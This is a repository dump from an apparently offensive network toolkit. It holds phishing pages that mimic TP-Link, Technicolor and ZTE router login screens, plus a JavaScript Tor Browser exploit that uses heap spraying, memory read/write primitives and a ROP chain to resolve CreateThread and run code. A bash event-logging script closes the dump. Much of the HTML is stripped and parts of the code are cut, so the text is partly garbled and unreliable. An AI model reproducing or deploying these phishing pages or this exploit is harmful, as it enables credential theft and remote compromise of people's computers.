/bin/phishing/router-modem/TPLink/index.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/morpheus/5d81c9ea27efe381a1428466cfaf76cdd049680c/bin/phishing/router-modem/TPLink/index.html -------------------------------------------------------------------------------- /bin/phishing/router-modem/TPLink/top1_1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/morpheus/5d81c9ea27efe381a1428466cfaf76cdd049680c/bin/phishing/router-modem/TPLink/top1_1.jpg -------------------------------------------------------------------------------- /bin/phishing/router-modem/TPLink/top1_2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/morpheus/5d81c9ea27efe381a1428466cfaf76cdd049680c/bin/phishing/router-modem/TPLink/top1_2.jpg -------------------------------------------------------------------------------- /bin/phishing/router-modem/TPLink/top2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/morpheus/5d81c9ea27efe381a1428466cfaf76cdd049680c/bin/phishing/router-modem/TPLink/top2.jpg -------------------------------------------------------------------------------- /bin/phishing/router-modem/Technicolor/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Technicolor Gateway - Login 5 | 6 | 7 | 8 | 9 | 13 | 14 | 305 | 306 | 307 | 308 | 330 | 331 | 332 | 400 | 401 |
309 | 310 | 311 | 327 | 328 | 329 |
333 | 334 | 335 | 397 | 398 |
336 | 337 | 338 | 394 | 395 |
339 | 340 |
341 |
342 |
343 | 344 | 345 |
Login ! 346 |
Login
347 |

Enter your username and password to access the Technicolor Gateway

348 | 349 | 350 |
351 | 352 | 353 | 354 | 355 | 356 | 378 |
357 | 358 | 359 | 360 | 361 | 362 | 363 | 364 | 365 | 366 | 367 | 368 | 369 | 370 | 371 | 375 | 376 |
UserName:
Password:
372 | 373 | 374 |
377 |
379 |
380 |
381 |
382 |
383 | 384 | 391 | 392 |
393 |
396 |
399 |
402 | 403 | 404 | 405 | -------------------------------------------------------------------------------- /bin/phishing/router-modem/Technicolor/spacer.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/morpheus/5d81c9ea27efe381a1428466cfaf76cdd049680c/bin/phishing/router-modem/Technicolor/spacer.gif -------------------------------------------------------------------------------- /bin/phishing/router-modem/Technicolor/styles.css: -------------------------------------------------------------------------------- 1 | body {color:#000000; TEXT-ALIGN:left; FONT-SIZE:0.7em; FONT-WEIGHT:normal; FONT-STYLE:normal; TEXT-DECORATION:none;} 2 | body, th, td, tr, div, span {FONT-FAMILY:Verdana, Arial, Helvetica, sans-serif;vertical-align:top;} 3 | h1 {color:/*gray01*/#333; FONT-SIZE:1.5em; FONT-WEIGHT:bold;} 4 | em {color:/*color01*/#0199cb;font-weight:bold; font-style:normal;} 5 | a img {border:none;} 6 | strong {color:/*color01*/#0199cb;} 7 | ul {list-style-type:square;margin:0px;padding-left:16px;} 8 | .tableIcon {margin-right:4px;} 9 | 10 | .main {margin-left:auto;margin-right:auto;border-color:/*gray03*/#ADADAD;border-width:0px 1px 1px 1px;border-style:solid;} 11 | .page {padding:0px 15px 0px 15px;min-height:300px;} 12 | .pagebottom{background-color:transparent;height:10px;} 13 | 14 | .banner {font:normal 10pt verdana;} 15 | .banner td {padding:14px 10px 14px 10px;border-right:1px;} 16 | .nopadtable td{padding: 0px;} 17 | 18 | .product {color:/*gray04*/#666;font:bold 12pt verdana;text-align:left;margin:0px;} 19 | 20 | .displaySettings {color:/*gray04*/#666;margin:0px;} 21 | .displaySettings a, .displaySettings a:visited {font-weight:normal;color:/*gray04*/#666;} 22 | 23 | .login {text-align:center;} 24 | .login a, .login a:visited {font-weight:normal;color:black;} 25 | 26 | .logo {text-align:right;} 27 | 28 | .langSelect a:hover,.login a:hover,.displaySettings a:hover {color:/*color01*/#0199cb;} 29 | .langSelect form {display:inline;} 30 | 31 | .Menu {background-color:/*gray03*/#ADADAD;vertical-align:top;border-right:1px solid /*gray03*/#ADADAD} 32 | .MenuVBar {background-color:#FFFFFF; text-decoration:none;} 33 | 34 | .Menu1Item, .Menu1ItemOver {font-size:1.2em;padding:8px 12px 8px 12px; text-align:right;} 35 | .Menu1ItemOver {background-color:/*color01*/#0199cb;color:white;} 36 | .Menu1Item a { color:/*gray01*/#333; text-decoration:none; font-weight:bold;} 37 | .Menu1ItemOver a {color:black; text-decoration:none;font-weight:bold;color:white;} 38 | .Menu1Item a:hover, .Menu1ItemOver a:hover {font-weight:bold; text-decoration:underline;} 39 | 40 | .Menu2Item, .Menu2ItemOver {font-size:1em;padding:6px 12px 6px 12px;background-color:white; text-align:right;} 41 | .Menu2Item a {color:black; text-decoration:none;} 42 | .Menu2ItemOver a {color:black;font-weight:bold;text-decoration:none;} 43 | .Menu2Item a:hover, .Menu2ItemOver a:hover {color:/*color01*/#0199cb;text-decoration:underline;} 44 | 45 | .PageMessage {font-size:1em; font-weight:normal;border:1px solid /*gray05*/#CACACA;margin:-10px 0px 0px 0px;} 46 | .PageMessage td {padding:2px} 47 | .PageMessage img {margin-top:1px} 48 | 49 | .Table_Title {font-size:1em; color:white; background-color:/*gray04*/#666; FONT-WEIGHT:bold;} 50 | .Table_InfoBar {font-size:1em; background-color:transparent;padding-top:4px;} 51 | .Table_InfoBarWarning {font-size:1em; color:red; background-color:transparent;padding-bottom:6px;} 52 | .Table_DataLabel {font-size:1em; background-color:/*gray02*/#E2E2E2; FONT-WEIGHT:bold;} 53 | .Table_DataValue {font-size:1em; background-color:/*gray02*/#E2E2E2; FONT-WEIGHT:normal;} 54 | .Table_DataValue_Selected {font-size:1em; background-color:/*gray02*/#E2E2E2; FONT-WEIGHT:normal;} 55 | 56 | .Tab_Inactive a,.Tab_Active a {text-decoration:none;} 57 | .Tab_Inactive {color:/*gray04*/#666; background-color:/*gray02*/#E2E2E2; FONT-WEIGHT:normal;} 58 | .Tab_Active {color:white; background-color:/*color01*/#0199cb; FONT-WEIGHT:bold;} 59 | 60 | .Panel_ButtonBar {color:#FFFFFF; FONT-WEIGHT:bold;} 61 | .Panel_ButtonBar_Button { color:/*gray01*/#333; FONT-WEIGHT:bold; TEXT-ALIGN:center;} 62 | .Panel_ButtonBar_Button:Hover { color:/*color01*/#0199cb; FONT-WEIGHT:bold; TEXT-ALIGN:center;} 63 | 64 | .Form_Title {font-size:1em; color:white; background-color:/*gray04*/#666; FONT-WEIGHT:bold;} 65 | .Form_DataLabel {font-size:1em;} 66 | .Form_InputText {width:175pt; color:#000000;} 67 | .Form_InputPassword {width:175pt; color:#000000;} 68 | .Form_InputSelect {width:175pt; color:#000000;} 69 | .Form_InputSelect_Wide {width:250pt; color:#000000;} 70 | 71 | .wizardGrpToolbar {font-size:12px; font-weight:bold; background-color:#ffffff;} 72 | .wizardGrpTitle {font-size:12px; font-weight:bold; color:/*gray01*/#333;} 73 | .wizardGrpTxt {font-size:11px; font-weight:normal; color:#807F83;} 74 | 75 | .wizardCentralPanel {font-size:11px; font-weight:normal; color:#000000; background-color:#ffffff;} 76 | .wizardVarAlias {font-size:11px; font-weight:normal; color:#000000;} 77 | .wizardVarDesc {font-size:11px; font-weight:normal; color:#000000;} 78 | .wizardVarError {font-size:11px; font-weight:bold; color:#FF0000;} 79 | 80 | .wizardFrontCompletePanel {font-size:11px; color:#000000; background-color:#ffffff;} 81 | 82 | .wizardSummaryText {font-family:Fixedsys, Courier New, Courier ; font-size:1em; font-weight:normal; color:#000000; text-align:left; background-color:#ffffff;} 83 | .wizardFooterPanel {font-size:11px; font-weight:normal; color:#000000; background-color:#ffffff;} 84 | .wizardFooterPanelButton {font-size:11px; font-weight:normal; color:#000000; background-color:#ffffff; cursor:default;} 85 | 86 | .panelTitle {color:#ffffff; background-color:/*color01*/#0199cb; FONT-SIZE:12px; FONT-WEIGHT:bold;} 87 | .panelDelimiter {color:/*gray04*/#666; background-color:/*gray02*/#E2E2E2; FONT-SIZE:12px;} 88 | .panelToolbar {color:#FFFFFF; background-color:#CC9933; FONT-SIZE:12px; FONT-WEIGHT:bold; TEXT-ALIGN:center;} 89 | .panelLine {color:/*gray04*/#666; background-color:/*gray02*/#E2E2E2;} 90 | .panelButton {color:#FFFFFF; FONT-SIZE:12px; FONT-WEIGHT:bold; TEXT-DECORATION:underline;} 91 | .panelButtonSelected {color:#FFFFFF; FONT-SIZE:12px; FONT-WEIGHT:bold; TEXT-DECORATION:underline;} 92 | 93 | .error {FONT-WEIGHT:bold; color:#993333;} 94 | .margin {MARGIN-LEFT:5px; MARGIN-RIGHT:5px;} 95 | .warning {FONT-SIZE:1.1em; color:#993333; LINE-HEIGHT:normal;} 96 | .nogo {color:/*gray04*/#666; background-color:/*gray02*/#E2E2E2;} 97 | 98 | .black {background-color:#000000;} 99 | form {margin:0px;} 100 | 101 | .NavBar {margin:0px 0px 10px 0px;} 102 | .NavBar, .NavBar a, .NavBar a:visited {font-size:1em; color:/*gray01*/#333;TEXT-DECORATION:NONE;} 103 | .NavBar a:hover {font-size:1em; color:/*color01*/#0199cb;} 104 | 105 | .contentcontainer {margin:0px;} 106 | .contentcontainer a:link, .contentcontainer a:visited {color:/*color01*/#0199cb;} 107 | .contentcontainer a:hover {color:/*color01*/#0199cb;} 108 | .contentcontainer hr {visibility:hidden;display:none} 109 | .contentitem {padding:10px;text-align:left;width:auto;margin-bottom:10px;} 110 | 111 | .homeitemdescr {font-size:1.1em;} 112 | .homeline a:hover {font-weight:bold; color:/*color01*/#0199cb;} 113 | .homeline a:link,.homeline a:visited,.homeline a:active {font-weight:bold; color:/*color01*/#0199cb;} 114 | 115 | .itemtitle {color:/*gray01*/#333; font-size:1.6em; font-weight:bold;} 116 | 117 | .blocktitle {font-size:1.2em; color:#000000; font-weight:bold;} 118 | .blocktitle a:hover {font-weight:bold; color:/*color01*/#0199cb;} 119 | .blocktitle a:link,.blocktitle a:visited,.blocktitle a:active {font-weight:bold; color:/*color01*/#0199cb;} 120 | 121 | .hwintftable img {display:block;} 122 | .hwintftable td {vertical-align:middle;} 123 | .hwintftable a:hover {color:/*color01*/#0199cb;} 124 | .hwintftable a:link,.hwintftable a:visited,.hwintftable a:active {color:/*color01*/#0199cb;} 125 | 126 | .edittable {margin-bottom:6px;} 127 | .edittable th {color:white; background-color:/*gray04*/#666;} 128 | .edittable th, .edittable td {padding-left:4px; padding-right:4px;} 129 | .edittable .oddrow {background-color:/*gray05*/#CACACA;} 130 | .edittable .evenrow {background-color:/*gray02*/#E2E2E2;} 131 | 132 | .tasks {margin:12px 0px 10px 0px;} 133 | .tasks th {color:/*gray01*/#333;font-size:1.2em;text-align:left;width:100%;} 134 | .tasks th, .tasks td {padding:4px;} 135 | .task a:link,.task a:visited,.task a:active {color:/*color01*/#0199cb;text-decoration:none} 136 | .task a:hover {color:/*color01*/#0199cb;} 137 | 138 | /*gradients*/ 139 | .contentitem{ 140 | background-color:#F4F4F4; /* for non-css3 browsers */ 141 | filter: progid:DXImageTransform.Microsoft.gradient(GradientType=1, startcolorstr='#F4F4F4', endcolorstr='#CCCCCC'); /* for IE */ 142 | background: -webkit-gradient(linear, left top, right top, from(#F4F4F4), to(#CCCCCC)); /* for webkit browsers */ 143 | background: -moz-linear-gradient(left,#F4F4F4,#CCCCCC); /* for firefox 3.6+ */ 144 | } 145 | 146 | /*CSS para WLAN Host Details*/ 147 | #signalmeterbox { display:inline;background: url("images/dial.png") no-repeat 0 0; float: left; height: 135px; margin-bottom: 15px; margin-left: 55px; overflow: hidden; position: relative; width: 250px; } 148 | .Signal {} 149 | 150 | .wlanSigTable {width:600px;} 151 | .wlanSigTable #left {width:300px;vertical-align:middle;margin: 0px 5px 0px 0px;} 152 | .wlanSigForm {margin-left:30px;width:250px; disable:enabled; color:#333333; background: url(images/fake.png) center center no-repeat; /* This ruins default border */ border: 0px solid #888;} 153 | 154 | 155 | .wlanhost,.wlanhost a ,.wlanhost a:active,.wlanhost a:hover{ width:600px;margin: 0px 20px 8px 20px;} 156 | .wlanhostleft {vertical-align:text-middle; display:inline;width:300px;color:/*color01*/#000000;font-size:1.2em;font-weight:bold;} 157 | .wlanhostleft img {vertical-align:middle;margin: 0px 5px 0px 0px;} 158 | .wlanhostcenter {align:middle;margin: 0px 5px;text-align:center;width:85px;color:/*color01*/#000000;font-size:1.1em;font-weight:bold;} 159 | .wlanhostright {align:middle;margin: 0px 5px;text-align:center;width:85;color:/*color01*/#000000;font-size:1.2em;font-weight:bold;} 160 | .wlanhostlist {width:100%;} 161 | .wlannohost{text-align:center;width:600px;} 162 | 163 | .wlanhostlefth {vertical-align:text-middle; display:inline;width:300px;text-decoration:none;font-weight:bold; color:/*color01*/#0199cb;} 164 | .wlanhostlefth img {vertical-align:middle;margin: 0px 5px 0px 0px;} 165 | .wlanhostcenterh {align:middle;margin: 0px 5px;text-align:center;width:85px;font-weight:bold; color:/*color01*/#0199cb;} 166 | .wlanhostrighth {align:middle;margin: 0px 5px;text-align:center;width:85;} 167 | /*CSS para pagima GAMER*/ 168 | .disabled { vertical-align:text-top; color:#c90000; } 169 | .enabled { vertical-align:text-top; color:#389143; } 170 | /*CSS para WIFI ANALYZER*/ 171 | 172 | .oddrowline {border-width:1px 0px 1px 0px;border-style:solid;background-color:/*gray05*/#CACACA;} 173 | .oddrowline {background-color:/*color01*/#999999;} 174 | .oddrow, .evenrow,.oddrowline ,.evenrowline {padding: 0px 2px 0px 2px;} 175 | .edittable .oddrow {background-color:/*gray05*/#CACACA;} 176 | .oddrow {background-color:/*gray05*/#CACACA;} 177 | .edittable .evenrow {background-color:/*gray02*/#E2E2E2;} 178 | .evenrow {background-color:/*gray02*/#E2E2E2;} 179 | /*.GraphX {width:512px;text-align:center}*/ 180 | /*.GraphY {height:150px;vertical-align:middle;}*/ 181 | #Graph {width:512px;height:150px;position:relative;border-bottom:1px;border-top:0px; border-left:1px;border-right:0px;border-style:solid;} 182 | -------------------------------------------------------------------------------- /bin/phishing/router-modem/Technicolor/user__xl.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/morpheus/5d81c9ea27efe381a1428466cfaf76cdd049680c/bin/phishing/router-modem/Technicolor/user__xl.gif -------------------------------------------------------------------------------- /bin/phishing/router-modem/ZTE/chinese_1.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/morpheus/5d81c9ea27efe381a1428466cfaf76cdd049680c/bin/phishing/router-modem/ZTE/chinese_1.gif -------------------------------------------------------------------------------- /bin/phishing/router-modem/ZTE/close.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/morpheus/5d81c9ea27efe381a1428466cfaf76cdd049680c/bin/phishing/router-modem/ZTE/close.gif -------------------------------------------------------------------------------- /bin/phishing/router-modem/ZTE/help.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/morpheus/5d81c9ea27efe381a1428466cfaf76cdd049680c/bin/phishing/router-modem/ZTE/help.gif -------------------------------------------------------------------------------- /bin/phishing/router-modem/ZTE/login.css: -------------------------------------------------------------------------------- 1 | * { 2 | margin: 0 0 0 0; 3 | padding: 0; 4 | } 5 | #container { 6 | margin: 0 auto; 7 | width: 778px; 8 | text-align: left; 9 | position: relative; 10 | min-height: 100%; /* For Modern Browsers */ 11 | height: auto !important; /* For Modern Browsers */ 12 | height: 100%; /* For IE */ 13 | } 14 | #head { 15 | width:778px; 16 | } 17 | #banner { 18 | width:778px; 19 | height:60px; 20 | } 21 | #content { 22 | width:776px; 23 | padding-bottom:20px; 24 | min-height: 270px; /* For Modern Browsers */ 25 | height: auto !important; /* For Modern Browsers */ 26 | height: 50%; /* For IE */ 27 | border-left:1px solid #B1B1B1; 28 | border-right:1px solid #B1B1B1; 29 | } 30 | #content:after { 31 | clear: both; 32 | display: block; 33 | font: 1px/0px serif; 34 | content: "."; 35 | height: 0; 36 | visibility: hidden; 37 | } 38 | #content li { 39 | list-style:none; 40 | display:block; 41 | } 42 | #bottom { 43 | width: 776px; 44 | height: 28px; 45 | 46 | border-left:1px solid #B1B1B1; 47 | border-right:1px solid #B1B1B1; 48 | } 49 | #bottom li { 50 | list-style:none; 51 | float:left; 52 | height: 28px; 53 | } 54 | #bottom a { 55 | display:block; 56 | height:28px; 57 | } 58 | #bottom a.b1 { 59 | position:absolute; 60 | left:1px; 61 | width:156px; 62 | } 63 | #bottom a.b2 { 64 | width:54px; 65 | margin-right:2px; 66 | position:absolute; 67 | left:157px; 68 | } 69 | #bottom a.b2 ul { 70 | text-align:right; 71 | padding-top:5px; 72 | } 73 | #bottom a.b3 { 74 | width:564px; 75 | height:28px; 76 | position:absolute; 77 | left:211px; 78 | background-color:#81d549; 79 | margin-right:2px; 80 | text-align:right; 81 | } 82 | .copyright {height:16px;width:776px; padding-top:10px; border-left:1px solid #B1B1B1; border-right:1px solid #B1B1B1; text-align:center;} 83 | .bottom_line {background-color:#5aa929;height:8px; width:778px;} 84 | .submit {padding-top:2px;} 85 | #bottomx { 86 | width: 100%; 87 | position: absolute; 88 | bottom: 0 !important; 89 | bottom: -1px; /* For Certain IE widths */ 90 | height: 1px; 91 | } 92 | 93 | a:link { text-decoration: none; } 94 | a:visited { text-decoration: none; } 95 | a:active { text-decoration: none; } 96 | a:hover { text-decoration:none; } 97 | 98 | #loginArea { width:778px;height:389px;background-color:#f7f7f7; } 99 | .login_frame { width:380px;height:108px;position:absolute;top:155px;left:200px; } 100 | .login_title { width:380px;height:19px;background-color:#69ce28;list-style:none; } 101 | .login_title_left { width:4px;height:19px;float:left;} 102 | .login_title_center { width:286px;height:15px;float:left;padding:4px 0 0 5px;color:#ffffff;font-weight: bold;} 103 | .login_title_center2 { width:75px;height:19px;float:left;background:url(../img/push_2.gif) no-repeat left top;color:#ffffff;font-weight: bold;} 104 | .login_title_centeren { width:75px;height:19px;float:left;color:#ffffff;font-weight: bold;} 105 | .login_title_centerch { width:75px;height:19px;float:left;color:#ffffff;font-weight: bold;} 106 | .language_div { width:60px;height:15px;padding:4px 0 0 15px; } 107 | .login_title_right { width:4px;height:19px;float:left; } 108 | .login_content { width:378px;height:87px;background-color:#f8fff3;list-style:none;border:1px solid #69ce28; } 109 | .login_blank { width:337px;height:14px;list-style:none;padding-left: 10px } 110 | .login_ul_1 { width:337px;height:20px;list-style:none;padding-left: 10px } 111 | .login_li_1 { width:120px;height:17px;float:left;text-align:right;padding-top:3px; } 112 | .login_li_2 { width:135px;height:20px;float:left;padding-left:4px; } 113 | .login_li_3 { width:78px;height:20px;float:left; } 114 | 115 | .language_1 { color:#FFFFFF;font-weight: bold;} 116 | .language_1 a:link { color: #ffffff;font-weight: bold; text-decoration: none; } 117 | .language_1 a:visited { color: #ffffff;font-weight: bold; text-decoration: none; } 118 | .language_1 a:active { color: #ffffff;font-weight: bold; text-decoration: none; } 119 | .language_1 a:hover { color: #ffffff;font-weight: bold; text-decoration: none; } 120 | .type{ position:absolute;top:32px;right:25px;font:20px Arial,sans-serif;color:#fff;z-index:999; } 121 | 122 | html, body { 123 | height: 100%; /* Required */ 124 | font-size: 12px; 125 | font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; 126 | min-height:101%; 127 | background-color:#fff; /* 613000551662 - style unifys in case window color changes */ 128 | } 129 | 130 | 131 | .username,.password { 132 | width:120px; 133 | height:18px; 134 | border:1px solid #7F9DB7; 135 | font-size: 12px; 136 | font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; 137 | vertical-align:middle; 138 | text-align:left; 139 | } 140 | 141 | 142 | .login { 143 | height:22px; 144 | width:80px; 145 | vertical-align:middle; 146 | text-align:center; 147 | font-size: 12px; 148 | font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; 149 | } 150 | .note{ 151 | font-size: 12px; 152 | font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; 153 | color:#FFFF00; 154 | } -------------------------------------------------------------------------------- /bin/phishing/router-modem/ZTE/styleen.css: -------------------------------------------------------------------------------- 1 | body { 2 | font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; 3 | } 4 | 5 | .button5,.button6,.button7 { 6 | height:20px; 7 | vertical-align:middle; 8 | text-align:center; 9 | font-size: 12px; 10 | font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; 11 | } 12 | .button5 { 13 | width:80px; 14 | } 15 | .button6 { 16 | width:180px; 17 | } 18 | .button7 { 19 | width:120px; 20 | } 21 | 22 | .inputId10 { 23 | height:17px; 24 | border:1px solid #7F9DB7; 25 | font-size: 12px; 26 | font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; 27 | vertical-align:middle; 28 | text-align:left; 29 | } 30 | .inputId10 { 31 | width:120px; 32 | } 33 | .list_1,.list_2,.list_4,.list_8, { 34 | height:19px; 35 | border:1px solid #7F9DB7; 36 | font-size: 12px; 37 | font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; 38 | vertical-align:middle; 39 | text-align:left; 40 | } 41 | .list_1 { 42 | width:130px; 43 | } 44 | .list_2 { 45 | width:180px; 46 | } 47 | .list_4 { 48 | width:185px; 49 | } 50 | .list_8 { 51 | width:140px; 52 | } 53 | 54 | 55 | table.infor { 56 | width:460px; 57 | } 58 | table.infor tr.white_1 { 59 | background-color:#FFFFFF; 60 | } 61 | table.infor td.tdleft { 62 | padding-right:5px; 63 | width:50%; 64 | height:27px; 65 | text-align:right; 66 | } 67 | table.table td.td4 { 68 | width:10%; 69 | height:24px; 70 | text-align:right; 71 | } 72 | table.table td.td11 { 73 | width:50%; 74 | height:24px; 75 | text-align: right; 76 | } 77 | 78 | 79 | -------------------------------------------------------------------------------- /bin/phishing/router-modem/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | DiSpt 4 | 5 | 22 | 23 | 24 | 42 | 43 | 44 | 45 | 46 |

47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 |
 
 
56 | Authentication Required  57 |

58 | The server at http://GatWa:80 59 |
60 | requires a username and password. 61 |

62 |

Username:
Password:
 
 
86 | 87 | 88 | -------------------------------------------------------------------------------- /bin/phishing/router-modem/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | Modem access 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /bin/phishing/tor_0day/License: -------------------------------------------------------------------------------- 1 | 2 | MIT License 3 | 4 | Copyright (c) 2016 Tahar Amine 5 | 6 | Permission is hereby granted, free of charge, to any person obtaining a copy 7 | of this software and associated documentation files (the "Software"), to deal 8 | in the Software without restriction, including without limitation the rights 9 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 10 | copies of the Software, and to permit persons to whom the Software is 11 | furnished to do so, subject to the following conditions: 12 | 13 | The above copyright notice and this permission notice shall be included in all 14 | copies or substantial portions of the Software. 15 | 16 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 17 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 18 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 19 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 20 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 21 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 22 | SOFTWARE. 23 | 24 | -------------------------------------------------------------------------------- /bin/phishing/tor_0day/Tor-Exploit.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | The Onion Route Browser Exploit - TheBlaCkCoDeR 2016 5 | 6 | 140 | 141 | 152 | 153 | 154 | 155 |

156 | 157 |
158 | 159 | 162 | 163 | 164 | -------------------------------------------------------------------------------- /bin/phishing/tor_0day/cssbanner.js: -------------------------------------------------------------------------------- 1 | self.onmessage = 2 | function(msg) { 3 | 4 | thecode = msg.data; 5 | var pack = function (b) { var a = b >> 16; return String.fromCharCode(b 6 | & 65535) + String.fromCharCode(a) }; 7 | 8 | function Memory(b,a,f) 9 | { 10 | this._base_addr=b; 11 | this._read=a; 12 | this._write=f; 13 | this._abs_read = function(a) { 14 | a >= this._base_addr ? a = this._read( a - this._base_addr) : ( 15 | a = 4294967295 - this._base_addr + 1 + a, a = this._read(a) ); 16 | return 0>a?4294967295+a+1:a 17 | 18 | }; 19 | this._abs_write = function(a,b) { 20 | a >= this._base_addr ? this._write(a - this._base_addr, b) : ( a 21 | = 4294967295 - this._base_addr + 1 + a, this._write(a,b) ) 22 | }; 23 | this.readByte = function(a) { 24 | return this.read(a) & 255 25 | 26 | }; 27 | this.readWord = function(a) { 28 | return this.read(a) & 65535 29 | }; 30 | this.readDword = function(a){ return this.read(a) }; 31 | this.read = function(a,b) { 32 | if (a%4) { 33 | var c = this._abs_read( a & 4294967292), 34 | d = this._abs_read( a+4 & 4294967292), 35 | e = a%4; 36 | return c>>>8*e | d<<8*(4-e) 37 | } 38 | return this._abs_read(a) 39 | }; 40 | this.readStr = function(a) { 41 | for(var b = "", c = 0;;) { 42 | if (32 == c) 43 | return ""; 44 | var d = this.readByte(a+c); 45 | if(0 == d) 46 | break; 47 | b += String.fromCharCode(d); 48 | c++ 49 | } 50 | return b 51 | 52 | }; 53 | this.write = function(a){} 54 | } 55 | function PE(b,a) { 56 | this.mem = b; 57 | this.export_table = this.module_base = void 0; 58 | this.export_table_size = 0; 59 | this.import_table = void 0; 60 | this.import_table_size = 0; 61 | this.find_module_base = function(a) { 62 | for(a &= 4294901760; a; ) { 63 | if(23117 == this.mem.readWord(a)) 64 | return this.module_base=a; 65 | a -= 65536 66 | } 67 | }; 68 | this._resolve_pe_structures = function() { 69 | peFile = this.module_base + this.mem.readWord(this.module_base+60); 70 | if(17744 != this.mem.readDword(peFile)) 71 | throw"Bad NT Signature"; 72 | this.pe_file = peFile; 73 | this.optional_header = this.pe_file+36; 74 | this.export_directory = 75 | this.module_base+this.mem.readDword(this.pe_file+120); 76 | this.export_directory_size = this.mem.readDword(this.pe_file+124); 77 | this.import_directory=this.module_base+this.mem.readDword(this.pe_file+128); 78 | this.import_directory_size=this.mem.readDword(this.pe_file+132)}; 79 | this.resolve_imported_function=function(a,b){ 80 | void 0==this.import_directory&&this._resolve_pe_structures(); 81 | for(var 82 | e=this.import_directory,c=e+this.import_directory_size;e>2)+i] = d; 146 | d =(b+4>>2)+e; 147 | c[d++]=g; 148 | c[d++]=a+(b+4*e+28); 149 | c[d++]=a; 150 | c[d++]=4096; 151 | c[d++]=4096; 152 | c[d++]=64; 153 | c[d++]=3435973836; 154 | return c 155 | } 156 | } 157 | var conv=new ArrayBuffer(8), 158 | convf64=new Float64Array(conv), 159 | convu32=new Uint32Array(conv), 160 | qword2Double=function(b,a) { 161 | convu32[0]=b; 162 | convu32[1]=a; 163 | return convf64[0] 164 | }, 165 | doubleFromFloat = function(b,a) { 166 | convf64[0]=b; 167 | return convu32[a] 168 | 169 | }, 170 | sprayArrays=function() { 171 | for(var b=Array(262138),a=0;262138>a;a++) 172 | b[a]=fzero; 173 | for(a=0;aj;j++) 245 | spr[i][offset+(o2+16)/8+j]=qword2Double(memarrayloc+27,memarrayloc+27); 246 | spr[i][offset+(o3+8)/8]=qword2Double(0,0); 247 | spr[i][offset+(o5+0)/8]=qword2Double(arrBase+o11,0); 248 | spr[i][offset+(o7+168)/8]=qword2Double(0,3); 249 | spr[i][offset+(o7+88)/8]=qword2Double(0,2); 250 | break 251 | } 252 | for(;memory.length==len;); 253 | var mem=new Memory(memarrayloc+48, 254 | function(b){return memory[b/4]}, 255 | function(b,a){memory[b/4]=a}), 256 | xulPtr=mem.readDword(memarrayloc+12); 257 | spr[arr_index][arr_offset+1]=ropArrBuf; 258 | ropPtr=mem.readDword(arrBase+8); 259 | spr[arr_index][arr_offset+1]=null; 260 | ropBase=mem.readDword(ropPtr+16); 261 | var rop=new ROP(mem,xulPtr); 262 | rop.ropChain(ropBase,vtable_offset,10,ropArrBuf); 263 | var backupESP=rop.findSequence([137,1,195]), ropChain=new 264 | Uint32Array(ropArrBuf); 265 | ropChain[0]=backupESP; 266 | CreateThread=rop.pe.resolve_imported_function("KERNEL32.dll","CreateThread"); 267 | for(var i=0;i $rhost.log 41 | rm -f parse > /dev/nul 2>&1 42 | else 43 | external="YES" 44 | echo "" > warn.log 45 | fi 46 | if [ -e triggertwo ]; then 47 | secund=`cat triggertwo` 48 | echo "" > $secund.log 49 | rm -f triggertwo > /dev/nul 2>&1 50 | fi 51 | hour=`date | awk {'print $4,$5,$6'}` 52 | clear 53 | 54 | 55 | # 56 | # bash trap (ctrl+c) abort execution 57 | # 58 | trap ctrl_c INT 59 | ctrl_c() { 60 | echo "" 61 | echo "[Morpheus] Abort module execution .." 62 | sleep 2 63 | exit 64 | } 65 | 66 | 67 | 68 | # 69 | # first terminal message 70 | # 71 | if [ "$external" = "YES" ]; then 72 | echo "[Morpheus] Loging TCP/UDP Events .." 73 | echo " * Interface : $interface" 74 | echo " * Modem Ip : $modem" 75 | echo " * Hour/Date : $hour" 76 | echo " * ---" 77 | echo "" 78 | else 79 | echo "[Morpheus] Loging Events in: 67/UDP(dst) .." 80 | echo " * Interface : $interface" 81 | echo " * Modem Ip : $modem" 82 | echo " * Hour/Date : $hour" 83 | if [ -e $secund.log ]; then 84 | echo " * status : Filtering two targets at once [!]" 85 | echo " * Device : $rhost.lan" 86 | echo " * Device : $secund.lan" 87 | else 88 | echo " * Device : $rhost.lan" 89 | fi 90 | echo " * ---" 91 | echo "" 92 | fi 93 